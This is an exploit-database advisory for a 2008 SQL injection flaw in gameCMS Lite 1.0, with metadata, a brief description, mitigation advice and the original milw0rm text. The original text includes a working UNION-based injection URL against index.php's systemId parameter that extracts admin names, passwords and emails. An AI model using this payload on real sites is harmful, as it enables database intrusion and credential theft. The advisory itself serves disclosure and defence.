gameCMS Lite Remote SQL Injection Vulnerability

vendor:

gameCMS Lite

by:

InjEctOr5

CVSS

HIGH

SQL Injection

CWE

Product Name: gameCMS Lite

Affected Version From: 1

Affected Version To: 1

Patch Exists: NO

Related CWE: N/A

CPE: a:gamecms:gamecms_lite:1.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

gameCMS Lite Remote SQL Injection Vulnerability

gameCMS Lite 1.0 is vulnerable to a remote SQL injection vulnerability. An attacker can exploit this vulnerability to gain access to the database and execute arbitrary SQL commands. The vulnerability exists due to insufficient sanitization of user-supplied input in the 'id' parameter of the 'index.php' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request with malicious SQL commands to the vulnerable script.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.

Source

Exploit-DB raw data:

                                                       w           w     w 
                                                        ||          ||   | ||        
                                                 o_,_7 _||  . _o_7 _|| 4_|_||  o_w_, 
                                                ( :   /    (_)    /           (   .  
                              |-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
                              |     _                   __           __       __          ______     |
                              |   /' \            __  /'__`\        /\ \__  /'__`\       /\  ___\    |
                              |  /\_, \    ___   /\_\/\_\L\ \    ___\ \ ,_\/\ \/\ \  _ __\ \ \__/    |
                              |  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\ \___``\  |
                              |     \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ |
                              |      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\  \ \____/ |
                              |       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/   \/___/  |
                              |                  \ \____/ >> Kings of injection                      |
                              |                   \/___/                                             |
                              |                                                                      |
                              |-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|

-Title :: gameCMS Lite Remote SQL Injection Vulnerability
-Author :: InjEctOr5
-discouvred by :: total - djekmani
-HoMe :: www.sb0x.com/forums

-Application :: gameCMS Lite 1.0
-Download :: http://rapidshare.com/files/27043814/gameCMS.rar
-Dork  :: Clear your Mind

-Greets :: Allah - InjEctOr5 TeaM - stack terrorist - coNan - Mr_linker - my love - and all my friends

-Terms of use :: This exploit is just for educational purposes, DO NOT use it for illegal acts.

--------------------------------------------[C o n t e x t]-----------------------------------------

-ExplO!t : http://target/index.php?systemId=5'+union+select+1,2,concat_ws(0x3a3a,adminId,name,password,email,groupId),4,5+from+gamecms_admin/*

-------------------------------------------[End of  context]----------------------------------------

# milw0rm.com [2008-05-07]